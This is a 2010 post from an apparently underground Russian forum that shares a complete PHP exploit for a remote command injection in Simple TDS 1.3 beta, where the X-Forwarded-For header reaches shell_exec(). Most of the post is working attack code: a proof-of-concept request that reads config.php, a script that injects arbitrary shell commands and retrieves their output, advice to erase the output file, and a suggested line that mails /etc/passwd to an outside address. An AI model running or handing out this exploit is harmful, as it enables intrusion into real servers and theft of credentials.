Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor


Эксплойт Simple TDS

Автор ### , 07 Dec 2010 15:27

  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1
###
Отправлено 07 December 2010 - 15:27

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Simple TDS <= 1.3 beta shell_exec() Remote Command Injection Exploit
Злоумышленник может внедрять собственные команды в контексте функции shell_exec() через переменную $ip (скрипт go.php), благодаря отсутствию фильтрации. Эксплойт ниже:
/*
* 0x48k-stds13b-shellexec.php
* © hellknights.void.ru
* ========================
*
* EXPLOIT: Simple TDS <= 1.3 beta
* VULNERABILITY: shell_exec() Remote Command Injection Exploit
*
* ADVISORY:
* =========
*
* User can inject commands to shell_exec() function via $ip (go.php script):
*
* line#45: $ip = @getip();
* line#57: $addr = @explode (' ', @shell_exec ('' . $geoip_path . ' ' . $ip));
*
* $ip value could be set via "X-Forwarded-For" HTTP web-server environment (get_ip() function begins at line#9):
*
* function getip ()
* {
* if ((@getenv('HTTP_CLIENT_IP') AND @strcasecmp(@getenv('HTTP_CLIENT_IP'), 'unknown')))
* {
* $ip = @getenv('HTTP_CLIENT_IP');
* }
* else
* {
* if ((@getenv('HTTP_X_FORWARDED_FOR') AND @strcasecmp(@getenv('HTTP_X_FORWARDED_FOR'), 'unknown')))
* {
* $ip = @getenv('HTTP_X_FORWARDED_FOR');
* }
* ...
*
* Also hacker can use the "archive" directory (chmod 777) for command output or pipes for mailing stdout (cat /etc/passwd | mail h4xx0r@gmail.com).
*
* PROOF-OF-CONCEPT (reading config.php file):
* ===========================================
*
* $ telnet localhost 80
* GET /stds_1_3beta/go.php HTTP/1.0
* User-Agent: l33th4x0r
* X-Forwarded-For: 127.0.0.1; cat config.php > ./archive/tmp.txt
* Host: localhost
*
* $ GET ]]>[url="http://forum.prologic.su/go.php?http://localhost/stds_1_3beta/archive/tmp.txt"]http://localhost/std...ve/tmp.txt[/url]]]>
* *
* $mysql_host = "localhost";
* $mysql_login = "root";
* $mysql_password = "z3r0d4yy;
* $my_database = "stds";
*
* $password = "fhutynbyf";
* ...
*/

// send http packet function
function SendPacket($host, $port, $packet, $recv)
{
$sock = fsockopen($host,$port,$errno,$errstr);
if (!$sock){
die("\ncant connect to remote server");
}
else
{
fputs ($sock, $packet);

if($recv)
{
while (!feof($sock))
{
$out=fgets($sock,99999);
echo $out;
}
}
}
fclose ($sock);
}

// string cut
function strxcut($string, $offset_from, $offset_to)
{
$str_to = NULL;
for($i=$offset_from; $i <= $offset_to; $i++)
{
$str_to .= $string[$i];
}

return $str_to;
}

// packet dump
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}

// usage information
echo "\r\n";
echo "0x48k-stds13b-shellexec.php\r\n";
echo "Simple TDS <= 1.3 shell_exec() Remote Command Injection Exploit\r\n";
echo "© hellknights.void.ru\r\n";

if ($argc<5)
{
echo "Usage: php ".$argv[0]." host port path output cmd\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "port: target web-server's port\r\n";
echo "path: path to Simple TDS\r\n";
echo "output: output file (use ./archive/stats/index.html)\r\n";
echo "cmd: a shell command\r\n";
echo "\n\nExamples:\r\n";
echo "(1) READ CONFIG.PHP FILE:\nphp ".$argv[0]." localhost 80 /stds/ ./archive/index.html cat config.php\r\n";
echo "(2) DONT FORGET TO DELETE OUTPUT FILE:\nphp ".$argv[0]." localhost 80 /stds/ ./archive/index.html rm ./archive/index.html\r\n";
die;
}

// some configs
$user_agent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)";
$get_root_index = "index.html";
$dump_output = TRUE; // FALSE;
$xforward_ip = "127.0.0.1";

echo "-----------------------------------\r\n";
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$output = $argv[4];
$cmd = $argv[5];
$file_output = TRUE;

echo "host: ".$host."\r\n";
echo "port: ".$port."\r\n";
echo "path: ".$path."\r\n";
echo "output: ".$output."\r\n";

if($argc > 5)
{
for($i = 6; $i < $argc; $i++)
{
$cmd = $cmd." ".$argv[$i];
}
}

echo "cmd: ".$cmd."\r\n";

$cmd_inject = "$cmd";

// output to file ? (if rm output_file)
if($cmd == "rm $output" || $cmd == "del $output"){
$file_output = FALSE;
}

if($file_output){
$cmd_inject .= " > $output";
}

// output file (if ./archive/index.html, then GET /archive/ only)
$pos_to = strpos($output, $get_root_index);
if(!$pos_to){
$pos_to = strlen($output);
}
else{
$pos_to = $pos_to-1;
}

$pos_from = 0;

if($output[0].$output[1] == "./"){
$pos_from = 2;
}
else
if($output[0] == "/"){
$pos_from = 1;
}

$web_output = strxcut($output, $pos_from, $pos_to);

echo "-----------------------------------\r\n";

// exploit
$packet = "GET ".$path."go.php HTTP/1.0\r\n".
"User-Agent: $user_agent\r\n".
"X-Forwarded-For: $xforward_ip; $cmd > $output\r\n".
"Host: $host\r\n\r\n";

echo "\r\n\r\n[+] sending exploit...\r\n\r\n";
if($dump_output) echo quick_dump($packet);
SendPacket($host, $port, $packet, FALSE);

$packet = "GET ".$path."$web_output HTTP/1.0\r\n".
"User-Agent: $user_agent\r\n".
"Host: $host\r\n\r\n";

if($file_output)
{
echo "\r\n\r\n[+] get command result from output file...\r\n\r\n";
if($dump_output) echo quick_dump($packet);
echo "\r\n\r\n";
SendPacket($host, $port, $packet, TRUE);
echo "\r\n\r\n[+] exploited.\ndont forget to delete output file: rm $output\r\n\r\n";
}

?>

Ссылки из под хайдов не выдаю!

Обратно в Web уязвимости

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных

  1. ProLogic.Su
  2. Underground
  3. Уязвимости и Сплойты
  4. Web уязвимости